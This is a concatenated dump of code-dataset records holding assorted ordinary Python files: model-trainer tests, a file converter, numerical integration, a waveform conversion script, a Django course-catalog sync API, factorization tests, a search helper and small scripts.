use_cv=False,\n train_split_ratio=0.8,\n use_early_stopping=False)\n self.assertGreater(len(training.TrainedModel), db_size_pre)\n\n def test_B03_random_model_initializations(self):\n models = self.trainer.initialize_random_models(n_models=2, debug=True)\n model_inits = self.trainer.initialized_models_parameters\n self.assertNotEqual(Counter(model_inits[models[0]]), Counter(model_inits[models[1]]))\n\n def test_B04_model_parameters_kept_separate(self):\n models = [nets.MilkYieldGRU(optimizer=optim.RMSprop, debug=True),\n nets.MilkYieldLSTM(optimizer=optim.RMSprop, debug=True)]\n states = self.trainer.persist_trained_model_states(models)\n m1l1, m2l1 = len(states[models[0]]), len(states[models[1]])\n states = self.trainer.persist_trained_model_states(models)\n m1l2, m2l2 = len(states[models[0]]), len(states[models[1]])\n self.assertGreater(m1l2, m1l1)\n self.assertGreater(m2l2, m2l1)\n for model in models:\n m_states = states[model]\n self.assertEqual(len(m_states), 2)\n for key in m_states[0].keys():\n self.assertEqual(len(m_states[0][key]), len(m_states[1][key]))\n\n def test_B05_random_search(self):\n models = self.trainer.initialize_random_models(n_models=2, debug=True)\n db_size_pre = len(training.TrainedModel)\n self.trainer.train(\n dataset=self.dataset,\n models=models,\n epochs=1,\n use_cv=False,\n train_split_ratio=0.8,\n use_early_stopping=True)\n self.assertGreater(len(training.TrainedModel), db_size_pre)\n self.assertEqual(len(training.TrainedModel), db_size_pre+2)\n\n\nclass MilkYieldModelTrainerDBTests(ModelTrainerTests, MilkYieldModelTrainerTests):\n\n def setUp(self):\n self.assertTrue(os.path.isfile(test_settings.MILKING_DB_PATH))\n self.batch_size = 4\n self.dataset = datasets.MilkYieldDataset(data_source='db', data_source_path=test_settings.MILKING_DB_PATH, log=False)\n self.trainer = trainer.MilkYieldModelTrainer(batch_size=self.batch_size, num_workers=2, db_path=test_settings.TRAINING_DB_PATH)\n self.model = nets.MilkYieldLSTM(optimizer=optim.SGD, optimizer_params={'lr': 1e-5}, debug=True)\n test_nets.rename_model(self.model)\n\n\nclass MilkYieldModelTrainerCSVTests(ModelTrainerTests, MilkYieldModelTrainerTests):\n\n def setUp(self):\n self.assertTrue(os.path.isfile(test_settings.CSV_PATH))\n self.batch_size = 4\n self.dataset = datasets.MilkYieldDataset(data_source='csv', data_source_path=test_settings.CSV_PATH, log=False)\n self.trainer = trainer.MilkYieldModelTrainer(batch_size=self.batch_size, num_workers=2, db_path=test_settings.TRAINING_DB_PATH)\n self.model = nets.MilkYieldLSTM(optimizer=optim.SGD, optimizer_params={'lr': 1e-5}, debug=True)\n test_nets.rename_model(self.model)\n\n\nclass MilkYieldModelTrainerHDF5Tests(ModelTrainerTests, MilkYieldModelTrainerTests):\n\n def setUp(self):\n self.assertTrue(os.path.isfile(test_settings.HDF5_PATH))\n self.batch_size = 4*30\n self.dataset = datasets.MilkYieldDataset(data_source='hdf5', data_source_path=test_settings.HDF5_PATH, log=False)\n self.trainer = trainer.MilkYieldModelTrainer(batch_size=self.batch_size, num_workers=2, db_path=test_settings.TRAINING_DB_PATH)\n self.model = nets.MilkYieldLSTM(optimizer=optim.SGD, optimizer_params={'lr': 1e-5}, debug=True)\n test_nets.rename_model(self.model)\n","sub_path":"tests/milk_production_analysis/test_model/test_trainer.py","file_name":"test_trainer.py","file_ext":"py","file_size_in_byte":11111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"562210827","text":"from wand.image import Image\nfrom wand.color import Color\nimport base64\n\ndata = open(\"pdfto64.txt\", \"rb\").read()\nf = open(\"64topdf.pdf\", \"w\")\nf.write(data.decode('base64'))\nf.close()\n\nwith Image(filename=\"64topdf.pdf\", resolution=100) as img:\n with Image(width=img.width, height=img.height, background=Color(\"white\")) as bg:\n bg.composite(img,0,0)\n bg.save(filename=\"pdftojpg.jpg\")\n\ndata = open(\"pdftojpg.jpg\", \"rb\").read().encode(\"base64\")\nf = open(\"jpgto64.txt\", \"w\")\nf.write(data)\nf.close()\n","sub_path":"Other files/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"473997726","text":"import sys\nimport math\n\n\ndef display_help():\n if len(sys.argv) == 2:\n if sys.argv[1] == '-h' or sys.argv[1] == '--help':\n print(\"USAGE\")\n print(\"\\t./110borwein n\\n\")\n print(\"DESCRIPTION\")\n print(\"\\tn\\tconstant defining the integral to be computed\")\n sys.exit(0)\n else:\n sys.exit(84)\n\n\ndef calc(x):\n res = 1\n i = 0\n n = float(sys.argv[1])\n while i <= n:\n if x != 0:\n res *= math.sin(x / (2 * i + 1)) / (x / (2 * i + 1))\n i += 1\n return res\n\n\ndef midpoint():\n h = 0.5\n i = 0.0\n res = 0.0\n while (i < 10000):\n x = i / 2\n res += calc(x + 0.25)\n i += 1\n res *= 0.5\n diff = res - (math.pi * 0.5)\n print(\"Midpoint:\")\n print(\"I%d = %.10f\" % (int(sys.argv[1]), res))\n if (round(diff, 10) == -0):\n print(\"diff = 0.0000000000\")\n else:\n print(\"diff = %.10f\" % (math.fabs(diff)))\n print()\n\n\ndef trapezoid():\n h = 0.5\n res = 0\n i = 1.0\n while (i < 10000):\n x = i * h\n res += calc(x)\n i += 1\n res = ((res * 2) + calc(0) + calc(5000))\n diff = (res * h / 2) - (math.pi * 0.5)\n print(\"Trapezoidal:\")\n print(\"I%d = %.10f\" % (int(sys.argv[1]), (res * h / 2)))\n if (round(diff, 10) == -0):\n print(\"diff = 0.0000000000\")\n else:\n print(\"diff = %.10f\" % (math.fabs(diff)))\n print()\n\n\ndef simpsons():\n h = 0.5\n res = 0\n i = 0\n while (i < 10000):\n x = i * h\n if (i < 1):\n res += 4 * calc(x + h / 2)\n else:\n res += 2 * calc(x) + 4 * calc(x + h / 2)\n i += 1\n res = (calc(0) + calc(5000) + res) * h / 6\n diff = res - (math.pi * 0.5)\n print(\"Simpson:\")\n print(\"I%d = %.10f\" % (int(sys.argv[1]), res))\n if (round(diff, 10) == -0):\n print(\"diff = 0.0000000000\")\n else:\n print(\"diff = %.10f\" % (math.fabs(diff)))\n\n\ndef main():\n display_help()\n try:\n if (int(sys.argv[1]) < 0):\n sys.exit(84)\n except ValueError:\n sys.exit(84)\n midpoint()\n trapezoid()\n simpsons()\n sys.exit(0)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"22445638","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 29 14:25:49 2018\n\n@author: Phil Laird\n\"\"\"\nimport pandas as pd\nimport sys\nsys.path.append('/mnt/data01/workspace/bm_data/wave_analysis')\n\nimport sqlite3\nimport os\nimport convert\n\n\ndbfile = '/mnt/data04/Conduit/waves.db'\ndb = sqlite3.connect(dbfile)\nsql = (\"SELECT * FROM reports WHERE completed=0\")\nrows = pd.read_sql(sql, db)\noutpath = '/mnt/data04/Conduit/echo/waves/'\ntime_window = 24 # hours before and after echo time to convert waveforms\ndb.close()\n\n\nfor index, row in rows.iterrows():\n# print (row)\n path = row['path']\n if 'converted' in path:\n path = '/mnt/data04/bm_data/converted_xml'\n \n infile = path + '/' + row['filename']\n \n if not os.path.exists(infile):\n print ('trying converted files')\n infile = '/mnt/data04/bm_data/converted_xml/'+ row['filename']\n \n outfile = outpath + 'echo_case_' + format(row['Serial'], '03d') + '.hd5'\n serial = row['Serial']\n echo_time = pd.to_datetime(row['Date'])\n start_time = echo_time - pd.to_timedelta(time_window, 'H')\n stop_time = echo_time + pd.to_timedelta(time_window, 'H')\n #print ('Scanning file {} from {} to {}'.format(infile, start_time, stop_time))\n print ('Processing Serial: {} from file {}'.format(serial,outfile))\n \n # open db connection\n # update started field\n \n db = sqlite3.connect(dbfile)\n c = db.cursor()\n sql = ''' UPDATE reports\n SET started = 1\n WHERE Serial = ? '''\n \n c.execute(sql, (serial, ))\n db.commit()\n db.close()\n \n # start conversion of xml to hd5 for specified times\n\n convert.append_wfs(infile, outfile, start_time, stop_time)\n \n \n # update db\n \n db = sqlite3.connect(dbfile)\n c = db.cursor()\n \n\n sql = ''' UPDATE reports\n SET completed = 1 \n WHERE Serial = ? '''\n \n c.execute(sql, (serial, ))\n db.commit()\n db.close()\n \n \n # close db connection","sub_path":"echo_convert.py","file_name":"echo_convert.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"176473307","text":"\"\"\"\ncourse_catalog api functions\n\"\"\"\nfrom datetime import datetime\nimport logging\nimport os\nimport re\nfrom subprocess import check_call, CalledProcessError\nfrom tempfile import TemporaryDirectory\n\nimport boto3\nimport rapidjson\nfrom django.db import transaction\nfrom django.conf import settings\nfrom django.contrib.contenttypes.models import ContentType\nfrom ocw_data_parser import OCWParser\nimport pytz\n\nfrom course_catalog.constants import (\n PlatformType,\n NON_COURSE_DIRECTORIES,\n AvailabilityType,\n OfferedBy,\n)\nfrom course_catalog.etl.loaders import load_offered_bys, load_content_files\nfrom course_catalog.etl.ocw import (\n get_ocw_learning_course_bucket,\n transform_content_files,\n)\nfrom course_catalog.etl.xpro import (\n get_xpro_learning_course_bucket,\n transform_content_files as transform_content_files_xpro,\n)\nfrom course_catalog.models import Bootcamp, LearningResourceRun, Course\nfrom course_catalog.serializers import (\n BootcampSerializer,\n OCWSerializer,\n LearningResourceRunSerializer,\n)\nfrom course_catalog.utils import get_course_url\nfrom search.task_helpers import (\n delete_course,\n upsert_course,\n index_new_bootcamp,\n update_bootcamp,\n)\n\nlog = logging.getLogger(__name__)\n\n\ndef safe_load_json(json_string, json_file_key):\n \"\"\"\n Loads the passed string as a JSON object with exception handing and logging.\n Some OCW JSON content may be malformed.\n\n Args:\n json_string (str): The JSON contents as a string\n json_file_key (str or bytes): file ID for the JSON file\n\n Returns:\n JSON (dict): the JSON contents as JSON\n \"\"\"\n try:\n loaded_json = rapidjson.loads(json_string)\n return loaded_json\n except rapidjson.JSONDecodeError:\n log.exception(\"%s has a corrupted JSON\", json_file_key)\n return {}\n\n\ndef digest_ocw_course(master_json, last_modified, is_published, course_prefix=\"\"):\n \"\"\"\n Takes in OCW course master json to store it in DB\n\n Args:\n master_json (dict): course master JSON object as an output from ocw-data-parser\n last_modified (datetime): timestamp of latest modification of all course files\n is_published (bool): Flags OCW course as published or not\n course_prefix (str): (Optional) String used to query S3 bucket for course raw JSONs\n \"\"\"\n if \"course_id\" not in master_json:\n log.error(\"Course %s is missing 'course_id'\", master_json.get(\"uid\"))\n return\n\n existing_course_instance = Course.objects.filter(\n platform=PlatformType.ocw.value, course_id=master_json[\"course_id\"]\n ).first()\n\n ocw_serializer = OCWSerializer(\n data={\n **master_json,\n \"last_modified\": last_modified,\n \"is_published\": True, # This will be updated after all course runs are serialized\n \"course_prefix\": course_prefix,\n },\n instance=existing_course_instance,\n )\n if not ocw_serializer.is_valid():\n log.error(\n \"Course %s is not valid: %s %s\",\n master_json.get(\"uid\"),\n ocw_serializer.errors,\n master_json.get(\"image_src\"),\n )\n return\n\n # Make changes atomically so we don't end up with partially saved/deleted data\n with transaction.atomic():\n if existing_course_instance is None:\n course = ocw_serializer.save()\n else:\n course = existing_course_instance\n\n load_offered_bys(course, [{\"name\": OfferedBy.ocw.value}])\n\n # Try and get the run instance.\n courserun_instance = course.runs.filter(\n platform=PlatformType.ocw.value, run_id=master_json.get(\"uid\")\n ).first()\n run_serializer = LearningResourceRunSerializer(\n data={\n **master_json,\n \"platform\": PlatformType.ocw.value,\n \"key\": master_json.get(\"uid\"),\n \"is_published\": is_published,\n \"staff\": master_json.get(\"instructors\"),\n \"seats\": [{\"price\": \"0.00\", \"mode\": \"audit\", \"upgrade_deadline\": None}],\n \"content_language\": master_json.get(\"language\"),\n \"short_description\": master_json.get(\"description\"),\n \"level_type\": master_json.get(\"course_level\"),\n \"year\": master_json.get(\"from_year\"),\n \"semester\": master_json.get(\"from_semester\"),\n \"availability\": AvailabilityType.current.value,\n \"image\": {\n \"src\": master_json.get(\"image_src\"),\n \"description\": master_json.get(\"image_description\"),\n },\n \"max_modified\": last_modified,\n \"content_type\": ContentType.objects.get(model=\"course\").id,\n \"object_id\": course.id,\n \"url\": get_course_url(\n master_json.get(\"uid\"), master_json, PlatformType.ocw.value\n ),\n \"raw_json\": master_json,\n },\n instance=courserun_instance,\n )\n if not run_serializer.is_valid():\n log.error(\n \"OCW LearningResourceRun %s is not valid: %s\",\n master_json.get(\"uid\"),\n run_serializer.errors,\n )\n return\n run = run_serializer.save()\n\n if existing_course_instance is not None:\n best_run = (\n existing_course_instance.runs.filter(published=True)\n .filter(best_start_date__isnull=False)\n .order_by(\"-best_start_date\")\n .first()\n )\n if best_run is not None and run.id == best_run.id:\n ocw_serializer.save()\n\n load_offered_bys(run, [{\"name\": OfferedBy.ocw.value}])\n return course, run\n\n\ndef get_s3_object_and_read(obj, iteration=0):\n \"\"\"\n Attempts to read S3 data, and tries again up to MAX_S3_GET_ITERATIONS if it encounters an error.\n This helps to prevent read timeout errors from stopping sync.\n\n Args:\n obj (s3.ObjectSummary): The S3 ObjectSummary we are trying to read\n iteration (int): A number tracking how many times this function has been run\n\n Returns:\n bytes: The contents of a json file read from S3\n \"\"\"\n try:\n return obj.get()[\"Body\"].read()\n except Exception: # pylint: disable=broad-except\n if iteration < settings.MAX_S3_GET_ITERATIONS:\n return get_s3_object_and_read(obj, iteration + 1)\n else:\n raise\n\n\ndef format_date(date_str):\n \"\"\"\n Coverts date from 2016/02/02 20:28:06 US/Eastern to 2016-02-02 20:28:06-05:00\n\n Args:\n date_str (String): Datetime object as string in the following format (2016/02/02 20:28:06 US/Eastern)\n Returns:\n Datetime object if passed date is valid, otherwise None\n \"\"\"\n if date_str and date_str != \"None\":\n date_pieces = date_str.split(\" \") # e.g. 2016/02/02 20:28:06 US/Eastern\n date_pieces[0] = date_pieces[0].replace(\"/\", \"-\")\n # Discard milliseconds if exists\n date_pieces[1] = (\n date_pieces[1][:-4] if \".\" in date_pieces[1] else date_pieces[1]\n )\n tz = date_pieces.pop(2)\n timezone = pytz.timezone(tz) if \"GMT\" not in tz else pytz.timezone(\"Etc/\" + tz)\n tz_stripped_date = datetime.strptime(\" \".join(date_pieces), \"%Y-%m-%d %H:%M:%S\")\n tz_aware_date = timezone.localize(tz_stripped_date)\n tz_aware_date = tz_aware_date.astimezone(pytz.utc)\n return tz_aware_date\n return None\n\n\ndef generate_course_prefix_list(bucket):\n \"\"\"\n Assembles a list of OCW course prefixes from an S3 Bucket that contains all the raw jsons files\n\n Args:\n bucket (s3.Bucket): Instantiated S3 Bucket object\n Returns:\n List of course prefixes\n \"\"\"\n ocw_courses = set()\n log.info(\"Assembling list of courses...\")\n for bucket_file in bucket.objects.all():\n key_pieces = bucket_file.key.split(\"/\")\n course_prefix = (\n \"/\".join(key_pieces[0:2]) if key_pieces[0] == \"PROD\" else key_pieces[0]\n )\n # retrieve courses, skipping non-courses (bootcamps, department topics, etc)\n if course_prefix not in NON_COURSE_DIRECTORIES:\n if \"/\".join(key_pieces[:-2]) != \"\":\n ocw_courses.add(\"/\".join(key_pieces[:-2]) + \"/\")\n return list(ocw_courses)\n\n\ndef get_course_availability(course):\n \"\"\"\n Gets the attribute `availability` for a course if any\n\n Args:\n course (Course): Course model instance\n\n Returns:\n str: The url for the course if any\n \"\"\"\n if course.platform == PlatformType.ocw.value:\n return AvailabilityType.current.value\n elif course.platform == PlatformType.mitx.value:\n course_json = course.raw_json\n if course_json is None:\n return\n runs = course_json.get(\"course_runs\")\n if runs is None:\n return\n # get appropriate course_run\n for run in runs:\n if run.get(\"key\") == course.course_id:\n return run.get(\"availability\")\n\n\ndef parse_bootcamp_json_data(bootcamp_data, force_overwrite=False):\n \"\"\"\n Main function to parse bootcamp json data for one bootcamp\n\n Args:\n bootcamp_data (dict): The JSON object representing the bootcamp\n force_overwrite (bool): A boolean value to force the incoming bootcamp data to overwrite existing data\n \"\"\"\n # Get the last modified date from the bootcamp\n bootcamp_modified = bootcamp_data.get(\"last_modified\")\n\n # Try and get the bootcamp instance. If it exists check to see if it needs updating\n try:\n bootcamp_instance = Bootcamp.objects.get(\n course_id=bootcamp_data.get(\"course_id\")\n )\n compare_datetime = datetime.strptime(\n bootcamp_modified, \"%Y-%m-%dT%H:%M:%S.%fZ\"\n ).astimezone(pytz.utc)\n if compare_datetime <= bootcamp_instance.last_modified and not force_overwrite:\n log.debug(\n \"(%s, %s) skipped\",\n bootcamp_data.get(\"key\"),\n bootcamp_data.get(\"course_id\"),\n )\n return\n index_func = update_bootcamp\n except Bootcamp.DoesNotExist:\n bootcamp_instance = None\n index_func = index_new_bootcamp\n\n # Overwrite platform with our own enum value\n bootcamp_data[\"platform\"] = PlatformType.bootcamps.value\n bootcamp_serializer = BootcampSerializer(\n data=bootcamp_data, instance=bootcamp_instance\n )\n if not bootcamp_serializer.is_valid():\n log.error(\n \"Bootcamp %s is not valid: %s\",\n bootcamp_data.get(\"course_id\"),\n bootcamp_serializer.errors,\n )\n return\n\n # Make changes atomically so we don't end up with partially saved/deleted data\n with transaction.atomic():\n bootcamp = bootcamp_serializer.save()\n load_offered_bys(bootcamp, [{\"name\": OfferedBy.bootcamps.value}])\n\n # Try and get the LearningResourceRun instance.\n try:\n run_instance = bootcamp.runs.get(run_id=bootcamp.course_id)\n except LearningResourceRun.DoesNotExist:\n run_instance = None\n run_serializer = LearningResourceRunSerializer(\n data={\n **bootcamp_data,\n \"key\": bootcamp_data.get(\"course_id\"),\n \"staff\": bootcamp_data.get(\"instructors\"),\n \"seats\": bootcamp_data.get(\"prices\"),\n \"start\": bootcamp_data.get(\"start_date\"),\n \"end\": bootcamp_data.get(\"end_date\"),\n \"run_id\": bootcamp.course_id,\n \"max_modified\": bootcamp_modified,\n \"content_type\": ContentType.objects.get(model=\"bootcamp\").id,\n \"object_id\": bootcamp.id,\n \"url\": bootcamp.url,\n },\n instance=run_instance,\n )\n if not run_serializer.is_valid():\n log.error(\n \"Bootcamp LearningResourceRun %s is not valid: %s\",\n bootcamp_data.get(\"key\"),\n run_serializer.errors,\n )\n return\n run = run_serializer.save()\n\n load_offered_bys(run, [{\"name\": OfferedBy.bootcamps.value}])\n\n index_func(bootcamp.id)\n\n\ndef sync_ocw_course_files(ids=None):\n \"\"\"\n Sync all OCW course run files for a list of course ids to database\n\n Args:\n ids(list of int or None): list of course ids to process, all if None\n \"\"\"\n bucket = get_ocw_learning_course_bucket()\n courses = Course.objects.filter(platform=\"ocw\").filter(published=True)\n if ids:\n courses = courses.filter(id__in=ids)\n for course in courses.iterator():\n runs = course.runs.exclude(url=\"\").exclude(published=False)\n for run in runs.iterator():\n try:\n s3_master_json = rapidjson.loads(\n bucket.Object(\n \"{}/{}_master.json\".format(run.url.split(\"/\")[-1], run.run_id)\n )\n .get()[\"Body\"]\n .read()\n )\n load_content_files(run, transform_content_files(s3_master_json))\n except: # pylint: disable=bare-except\n log.exception(\"Error syncing files for course run %d\", run.id)\n\n\n# pylint: disable=too-many-locals, too-many-branches, too-many-statements\ndef sync_ocw_course(\n *, course_prefix, raw_data_bucket, force_overwrite, upload_to_s3, blacklist\n):\n \"\"\"\n Sync an OCW course run\n\n Args:\n course_prefix (str): The course prefix\n raw_data_bucket (boto3.resource): The S3 bucket containing the OCW information\n force_overwrite (bool): A boolean value to force the incoming course data to overwrite existing data\n upload_to_s3 (bool): If True, upload course media to S3\n blacklist (list of str): list of course ids that should not be published\n\n Returns:\n str:\n The UID, or None if the run_id is not found, or if it was found but not synced\n \"\"\"\n loaded_raw_jsons_for_course = []\n last_modified_dates = []\n uid = None\n is_published = True\n log.info(\"Syncing: %s ...\", course_prefix)\n\n # Collect last modified timestamps for all course files of the course\n for obj in raw_data_bucket.objects.filter(Prefix=course_prefix):\n # the \"1.json\" metadata file contains a course's uid\n if obj.key == course_prefix + \"0/1.json\":\n try:\n first_json = safe_load_json(get_s3_object_and_read(obj), obj.key)\n uid = first_json.get(\"_uid\")\n last_published_to_production = format_date(\n first_json.get(\"last_published_to_production\", None)\n )\n last_unpublishing_date = format_date(\n first_json.get(\"last_unpublishing_date\", None)\n )\n if last_published_to_production is None or (\n last_unpublishing_date\n and (last_unpublishing_date > last_published_to_production)\n ):\n is_published = False\n except: # pylint: disable=bare-except\n log.exception(\"Error encountered reading 1.json for %s\", course_prefix)\n # accessing last_modified from s3 object summary is fast (does not download file contents)\n last_modified_dates.append(obj.last_modified)\n if not uid:\n # skip if we're unable to fetch course's uid\n log.info(\"Skipping %s, no course_id\", course_prefix)\n return None\n # get the latest modified timestamp of any file in the course\n last_modified = max(last_modified_dates)\n\n # if course run synced before, check if modified since then\n courserun_instance = LearningResourceRun.objects.filter(\n platform=PlatformType.ocw.value, run_id=uid\n ).first()\n\n # Make sure that the data we are syncing is newer than what we already have\n if (\n courserun_instance\n and last_modified <= courserun_instance.last_modified\n and not force_overwrite\n ):\n log.info(\"Already synced. No changes found for %s\", course_prefix)\n return None\n\n # fetch JSON contents for each course file in memory (slow)\n log.info(\"Loading JSON for %s...\", course_prefix)\n for obj in sorted(\n raw_data_bucket.objects.filter(Prefix=course_prefix),\n key=lambda x: int(x.key.split(\"/\")[-1].split(\".\")[0]),\n ):\n loaded_raw_jsons_for_course.append(\n safe_load_json(get_s3_object_and_read(obj), obj.key)\n )\n\n log.info(\"Parsing for %s...\", course_prefix)\n # pass course contents into parser\n parser = OCWParser(loaded_jsons=loaded_raw_jsons_for_course)\n course_json = parser.get_master_json()\n course_json[\"uid\"] = uid\n course_json[\"course_id\"] = \"{}.{}\".format(\n course_json.get(\"department_number\"), course_json.get(\"master_course_number\")\n )\n if course_json[\"course_id\"] in blacklist:\n is_published = False\n\n if upload_to_s3 and is_published:\n try:\n parser.setup_s3_uploading(\n settings.OCW_LEARNING_COURSE_BUCKET_NAME,\n settings.OCW_LEARNING_COURSE_ACCESS_KEY,\n settings.OCW_LEARNING_COURSE_SECRET_ACCESS_KEY,\n # course_prefix now has trailing slash so [-2] below is the last\n # actual element and [-1] is an empty string\n course_prefix.split(\"/\")[-2],\n )\n if settings.OCW_UPLOAD_IMAGE_ONLY:\n parser.upload_course_image()\n else:\n parser.upload_all_media_to_s3(upload_master_json=True)\n except: # pylint: disable=bare-except\n log.exception(\n (\"Error encountered uploading OCW files for %s\", course_prefix)\n )\n raise\n\n log.info(\"Digesting %s...\", course_prefix)\n try:\n course, run = digest_ocw_course(\n course_json, last_modified, is_published, course_prefix\n )\n except TypeError:\n log.info(\"Course and run not returned, skipping\")\n return None\n\n if upload_to_s3 and is_published:\n load_content_files(run, transform_content_files(course_json))\n\n course.published = is_published or (\n Course.objects.get(id=course.id).runs.filter(published=True).exists()\n )\n course.save()\n if course.published:\n upsert_course(course.id)\n else:\n delete_course(course)\n\n\ndef sync_ocw_courses(*, course_prefixes, blacklist, force_overwrite, upload_to_s3):\n \"\"\"\n Sync OCW courses to the database\n\n Args:\n course_prefixes (list of str): The course prefixes to process\n blacklist (list of str): list of course ids to skip\n force_overwrite (bool): A boolean value to force the incoming course data to overwrite existing data\n upload_to_s3 (bool): If True, upload course media to S3\n\n Returns:\n set[str]: All LearningResourceRun.run_id values for course runs which were synced\n \"\"\"\n raw_data_bucket = boto3.resource(\n \"s3\",\n aws_access_key_id=settings.OCW_CONTENT_ACCESS_KEY,\n aws_secret_access_key=settings.OCW_CONTENT_SECRET_ACCESS_KEY,\n ).Bucket(name=settings.OCW_CONTENT_BUCKET_NAME)\n\n for course_prefix in course_prefixes:\n try:\n sync_ocw_course(\n course_prefix=course_prefix,\n raw_data_bucket=raw_data_bucket,\n force_overwrite=force_overwrite,\n upload_to_s3=upload_to_s3,\n blacklist=blacklist,\n )\n except: # pylint: disable=bare-except\n log.exception(\"Error encountered parsing OCW json for %s\", course_prefix)\n\n\ndef sync_xpro_course_files(ids):\n \"\"\"\n Sync all xPRO course run files for a list of course ids to database\n\n Args:\n ids(list of int): list of course ids to process\n \"\"\"\n bucket = get_xpro_learning_course_bucket()\n\n try:\n most_recent_export = next(\n reversed(\n sorted(\n [\n obj\n for obj in bucket.objects.all()\n if re.search(r\"/exported_courses_\\d+\\.tar\\.gz$\", obj.key)\n ],\n key=lambda obj: obj.last_modified,\n )\n )\n )\n except StopIteration:\n log.warning(\"No xPRO exported courses found in xPRO S3 bucket\")\n return\n\n course_content_type = ContentType.objects.get_for_model(Course)\n with TemporaryDirectory() as export_tempdir, TemporaryDirectory() as tar_tempdir:\n tarbytes = get_s3_object_and_read(most_recent_export)\n tarpath = os.path.join(export_tempdir, \"temp.tar.gz\")\n with open(tarpath, \"wb\") as f:\n f.write(tarbytes)\n\n try:\n check_call([\"tar\", \"xf\", tarpath], cwd=tar_tempdir)\n except CalledProcessError:\n log.exception(\"Unable to untar %s\", most_recent_export)\n return\n\n for course_tarfile in os.listdir(tar_tempdir):\n matches = re.search(r\"(.+)\\.tar\\.gz$\", course_tarfile)\n if not matches:\n log.error(\n \"Expected a tar file in exported courses tarball but found %s\",\n course_tarfile,\n )\n continue\n run_id = matches.group(1)\n run = LearningResourceRun.objects.filter(\n platform=PlatformType.xpro.value,\n run_id=run_id,\n content_type=course_content_type,\n object_id__in=ids,\n ).first()\n if not run:\n log.info(\"No xPRO courses matched course tarfile %s\", course_tarfile)\n continue\n\n course_tarpath = os.path.join(tar_tempdir, course_tarfile)\n try:\n load_content_files(run, transform_content_files_xpro(course_tarpath))\n except: # pylint: disable=bare-except\n log.exception(\"Error ingesting OLX content data for %s\", course_tarfile)\n","sub_path":"course_catalog/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":22117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"443367030","text":"import unittest\nfrom functools import reduce\n\nfrom prime import is_prime\nfrom factorize import factorize\n\n\nclass TestFactorize(unittest.TestCase):\n first_25_primes = {+2, +3, +5, +7, 11,\n 13, 17, 19, 23, 29,\n 31, 37, 41, 43, 47,\n 53, 59, 61, 67, 71,\n 73, 79, 83, 89, 97}\n\n def test_is_prime(self):\n for n in range(100):\n if n in self.first_25_primes:\n self.assertTrue(is_prime(n), \"{} must be prime\".format(n))\n else:\n self.assertFalse(is_prime(n), \"{} must be non-prime\".format(n))\n\n def test_factorize(self):\n for n in range(2, 100):\n product = reduce(lambda r, f: r * (f[0] ** f[1]), factorize(n), 1)\n self.assertTrue(n == product,\n \"{} != {}, i.e. product of its factorization\".format(n, product))\n","sub_path":"problems-1/bogush/problem-1/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"586356289","text":"from django.shortcuts import render\nfrom django.db.models import Q\nimport re\n\n# Create your views here.\ndef simple_search(model, fields, query_string, show_all=True):\n if query_string:\n query_string = query_string.strip()\n\n if not query_string:\n if show_all:\n return model.objects.all()\n else:\n return model.objects.none()\n entry_query = build_query(query_string, fields)\n return model.objects.filter(entry_query)\n\n\ndef build_query(query_string, search_fields):\n query = None # Query to search for every search term\n terms = normalize_query(query_string)\n for term in terms:\n or_query = None # Query to search for a given term in each field\n for field_name in search_fields:\n q = Q(**{'%s__icontains' % field_name: term})\n\n if or_query:\n or_query = or_query | q\n else:\n or_query = q\n\n if query:\n query = query & or_query\n else:\n query = or_query\n return query\n\n\ndef normalize_query(query_string,\n findterms=re.compile(r'\"([^\"]+)\"|(\\S+)').findall,\n normspace=re.compile(r'\\s{2,}').sub):\n\n return [normspace(' ',\n (t[0] or t[1]).strip()) for t in findterms(query_string)]\n\n\ndef compile(pattern, flags=0):\n \"Compile a regular expression pattern, returning a pattern object.\"\n return _compile(pattern, flags)","sub_path":"src/apps/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"403132828","text":"import turtle\n\n\nwindow = turtle.Screen()\nturtle.speed(2)\ncolors = ['red','purple','blue','green','orange','yellow']\nrainben = turtle.Pen()\nturtle.bgcolor('black')\n\nfor i in range(360):\n rainben.pencolor(colors[i%6])\n rainben.width(i/100 + 1)\n rainben.forward(i)\n rainben.left(59)\n\n","sub_path":"spiral_helix.py","file_name":"spiral_helix.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"510607734","text":"# Import libraries\nimport json\n\n\n# Create method to read json file\ndef read(file):\n \"\"\"\n This method reads the string from a JSON file and parses the data into a dictionary object.\n :param file: A JSON file with the termination .json\n :type file: .json\n :return: It returns json_data\n :rtype: dict\n \"\"\"\n print('\\n Reading file')\n with open(file) as json_file:\n json_data = json.load(json_file)\n return json_data\n\n\ndef max_count(json_data):\n \"\"\"\n Finds the value of the most repeated number and the times it was repeated in the JSON file\n :param json_data: List with various numbers in it, ordered randomly\n :type: list\n :return: value and count\n :rtype: int, int\n \"\"\"\n # Declare variables value and count.\n value, count = 0, 0\n for i in json_data:\n if count < json_data.count(i):\n count = json_data.count(i)\n value = i\n return value, count\n\n\n# Prints the value of the most repeated number and the times it was repeated in the JSON file\nprint('\\n Starting...')\nprint('\\n', max_count(read('max_count.json')))\nprint('\\n Done')\n","sub_path":"Instrumentacion_Electronica/1_Activity/Luis_Serrano/maximum_count.py","file_name":"maximum_count.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"303206763","text":"import Image\nfrom pylab import *\n\nim = 